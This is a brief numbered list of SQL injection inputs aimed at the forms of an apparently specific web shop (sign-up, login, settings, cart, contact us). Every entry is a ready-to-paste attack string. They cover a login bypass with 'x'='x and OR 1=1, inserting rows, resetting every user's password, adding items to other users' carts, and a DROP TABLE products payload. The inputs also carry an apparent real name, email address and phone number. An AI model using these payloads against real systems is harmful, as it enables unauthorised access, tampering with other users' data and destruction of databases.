1)Run this at Sign Up Section and inside the first field :
Seyed Ismail','seyedismailms@gmail.com','123456789','6381497621','Vellore','1st Sreet')-- -

-------------------------------------------

2)Run this in the password field of Login Section :
  anything' or 'x'='x
##You can also directly insert into the email field ==> seyedismailms@gmail.com' OR 1=1--'

-------------------------------------------

3)Go to setting>and update password using the below query and every1's pasword will get updated:
  niloy@123'-- -

4)In the add to cart we can run queries and add products in someone else's cart from our account:
  2','1')-- -
  The first number is product id and the second number is the user id and both are linked to foreign keys

5)To drop go to contact us section and run the below query in the first field
   seyed','seyed@gmail.com','heyy');DROP table products;--